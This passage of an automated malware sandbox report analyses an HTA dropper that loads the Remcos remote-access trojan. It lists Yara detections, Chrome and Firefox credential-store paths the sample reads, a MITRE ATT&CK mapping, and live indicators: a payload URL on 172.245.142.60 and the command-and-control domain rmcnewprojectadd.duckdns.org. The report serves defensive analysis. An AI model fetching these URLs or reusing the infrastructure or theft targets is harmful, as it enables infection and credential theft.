Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00404915 GetLocalTime,CreateEventA,CreateThread,

11_2_00404915

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0041A7B2 GetComputerNameExW,GetUserNameW,

11_2_0041A7B2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_0044801F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

11_2_0040B21B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		11_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: \key3.db		11_2_0040B335

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-QEQMVZ

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: cmd.exe

11_2_00405042

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Native API	111 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Bypass User Account Control	2 Obfuscated Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	13 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	1 DLL Side-Loading	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	111 Input Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	Login Hook	1 Windows Service	1 Bypass User Account Control	NTDS	3 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	221 Process Injection	1 Masquerading	LSA Secrets	34 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Security Software Discovery	VNC	GUI Input Capture	213 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	221 Process Injection	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nicegirlforyou.hta	26%	ReversingLabs	Script-WScript.Trojan.Asthma
nicegirlforyou.hta	29%	Virustotal		Browse

Source	Detection	Scanner	Label
http://172.245.142.60/551/sheism	0%	Avira URL Cloud	safe
http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF	100%	Avira URL Cloud	malware
http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF4	0%	Avira URL Cloud	safe
rmcnewprojectadd.duckdns.org	100%	Avira URL Cloud	malware
http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFl	0%	Avira URL Cloud	safe
http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFC:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rmcnewprojectadd.duckdns.org	192.169.69.26	true	true	unknown
paste.ee	104.21.84.67	true	false	high
cloudinary.map.fastly.net	151.101.1.137	true	false	high
res.cloudinary.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF	true	Avira URL Cloud: malware	unknown
rmcnewprojectadd.duckdns.org	true	Avira URL Cloud: malware	unknown
https://paste.ee/r/03xCn/0	false		high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF4	powershell.exe, 00000003.00000002.2206466592.0000000007FE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2203877007.0000000005BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
